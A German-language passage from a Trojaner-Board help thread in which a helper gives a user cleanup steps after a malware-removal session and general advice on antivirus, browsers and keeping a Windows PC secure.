1. Was ist mit MBAM ? Der Startet mit dem Rechner mit ? Soll ich es einfach immer laufen lassen ? Oder nur beim Systemestart deaktivieren, oder komplett deinstallieren ? Wenn es drauf bleiben soll, soll ich regelmäßig was machen ?

2. Welches Anti vir Programm empfiehlst du mir ? Bitte kostenlos, oder günstig ^^

3. Welchen Browser soll ich lieber benutzen ? Firefox oder Chrome ?

4. Sollte ich regelmäßig was machen ?

cosinus 01.05.2016 22:04
Weil Tuningprogramme idR kontraproduktiv sind und in Händen von Laien die Windows-Installation irreparabel zerstören können. Und nein, Java braucht man einfach nicht mehr! (und sry es nervt wenn permanent Java mit JavaScript verwechselt wird)


Dann wären wir durch! :daumenhoc

Wenn Du möchtest, kannst Du hier sagen, ob Du mit mir und meiner Hilfe zufrieden warst...:dankeschoen:und/oder das Forum mit einer kleinen Spende http://www.trojaner-board.de/extra/spende.png unterstützen. :applaus:

Abschließend müssen wir noch ein paar Schritte unternehmen, um deinen Pc aufzuräumen und abzusichern.

http://deeprybka.trojaner-board.de/b...cleanupneu.png
Cleanup:
(Die Reihenfolge ist hier entscheidend)

Falls Defogger verwendet wurde: Erneut starten und auf Re-enable klicken.

Falls Combofix verwendet wurde:
http://deeprybka.trojaner-board.de/b.../combofix2.pngCombofix deinstallieren
  • Wichtig: Bitte Antivirus-Programm, evtl. vorhandenes Skript-Blocking und Anti-Malware Programme deaktivieren.
  • Drücke bitte die http://deeprybka.trojaner-board.de/b...ne/revo/w7.png + R Taste und schreibe Combofix /Uninstall in das Ausführen-Fenster.
  • Klicke auf OK.
    Damit wird Combofix komplett entfernt und der Cache der Systemwiederherstellung geleert.
  • Nun die eben deaktivierten Programme wieder aktivieren.

Alle Logs gepostet? Dann lade Dir bitte http://filepony.de/icon/tiny/delfix.pngDelFix herunter.
  • Schließe alle offenen Programme.
  • Starte die delfix.exe mit einem Doppelklick.
  • Setze vor jede Funktion ein Häkchen.
  • Klicke auf Start.

Hinweis: DelFix entfernt u.a. alle verwendeten Programme, die Quarantäne unserer Scanner, den Java-Cache und löscht sich abschließend selbst.
Starte Deinen Rechner abschließend neu. Sollten jetzt noch Programme aus unserer Bereinigung übrig sein, kannst Du diese bedenkenlos löschen.

http://deeprybka.trojaner-board.de/b...ast/schild.png
Absicherung:
Beim Betriebsystem Windows die automatischen Updates aktivieren. Auch die sicherheitsrelevante Software sollte immer nur in der aktuellsten Version vorliegen:

Browser
Java
 Flash-Player
PDF-Reader

Sicherheitslücken in deren alten Versionen werden dazu ausgenutzt, um beim einfachen Besuch einer manipulierten Website per "Drive-by" Malware zu installieren.
Ich empfehle z.B. die Verwendung von Mozilla Firefox statt des Internet Explorers. Zudem lassen sich mit dem Firefox auch PDF-Dokumente öffnen.

Aktiviere eine Firewall. Die in Windows integrierte genügt im Normalfall völlig.

Verwende ein einziges der folgenden Antivirusprogramme mit Echtzeitscanner und stets aktueller Signaturendatenbank:

   
 

Microsoft Security Essentials (MSE) ist ab Windows 8 fest eingebaut, wenn du also Windows 8, 8.1 oder 10 und dich für MSE entschieden hast, brauchst du nicht extra MSE zu installieren. Bei Windows 7 muss es aber manuell installiert oder über die Windows Updates als optionales Update bezogen werden. Selbstverständlich ist ein legales/aktiviertes Windows Voraussetzung dafür.

Zusätzlich kannst Du Deinen PC regelmäßig mit Malwarebytes Anti-Malware und/oder mit dem ESET Online Scanner scannen.

Optional:

http://filepony.de/icon/noscript.png NoScript verhindert das Ausführen von aktiven Inhalten (Java, JavaScript, Flash,...) für sämtliche Websites. Man kann aber nach dem Prinzip einer Whitelist festlegen, auf welchen Seiten Scripts erlaubt werden sollen. NoScript kann gerade bei technisch nicht allzu versierten Nutzern beim Surfen zum Nervfaktor werden; ob das Tool geeignet ist, muss jeder selbst mal ausprobieren und dann für sich entscheiden. Alternativen zu NoScript (wenn um das das Verhindern von Usertracking und Werbung auf Webseiten) geht wären da Ghostery oder uBlock. Ghostery ist eine sehr bekannte Erweiterung, die aber auch in Kritik geraten ist, vgl. dazu bitte diesen Thread => Ghostery schleift Werbung durch

http://filepony.de/icon/malwarebytes_anti_exploit.pngMalwarebytes Anti Exploit: Schützt die Anwendungen des Computers vor der Ausnutzung bekannter Schwachstellen.


Lade Software von einem sauberen Portal wie http://filepony.de/images/microbanner.gif.
Wähle beim Installieren von Software immer die benutzerdefinierte Option und entferne den Haken bei allen optional angebotenen Toolbars oder sonstigen, fürs Programm, irrelevanten Ergänzungen.
Um Adware wieder los zu werden, empfiehlt sich zunächst die Deinstallation sowie die anschließende Resteentfernung mit Adwcleaner .


Abschließend noch ein paar grundsätzliche Bemerkungen:
Ändere regelmäßig Deine wichtigen Online-Passwörter und erstelle regelmäßig Backups Deiner wichtigen Dateien oder des Systems.
Der Nutzen von Registry-Cleanern, Optimizern usw. zur Performancesteigerung ist umstritten. Ich empfehle deshalb, die Finger von der Registry zu lassen und lieber die windowseigene Datenträgerbereinigung zu verwenden.

Hinweis: Bitte gib mir eine kurze Rückmeldung wenn alles erledigt ist und keine Fragen mehr vorhanden sind, so dass ich dieses Thema aus meinen Abos löschen kann.

StOony 02.05.2016 20:04
Hätte noch ne Frage zu den Antivirus Programm, habe Ja da ich Win10 habe schon MSE drauf, nur du sagst ich soll nur EINS benutzen, soll ich dann auf Emsisoft und ESET verzichten ?

Wenn nein Welches von den Beiden antivirus Programmen soll ich nehmen ? Welches ist umsonst ? außerdem, zu welchem Browser rätst du mir ?
Ansonsten möchte ich mich echt bedanken bei dir

cosinus 02.05.2016 22:43
Die AV-Hersteller sollten eigentlich schon längst wissen, dass MSE als Windows Defender ab Windows 8 fest eingebaut ist und dementsprechend ihr Produkt optimieren. Ob das im Einzelnen aber bei ESET anders ist als bei Emsi solltest du vllt nochmal im Detail klären. Unser Forenmitarbeiter schrauber arbeitet bei Emsi.


Alle Zeitangaben in WEZ +1. Es ist jetzt 10:44 Uhr.

Copyright ©2000-2025, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131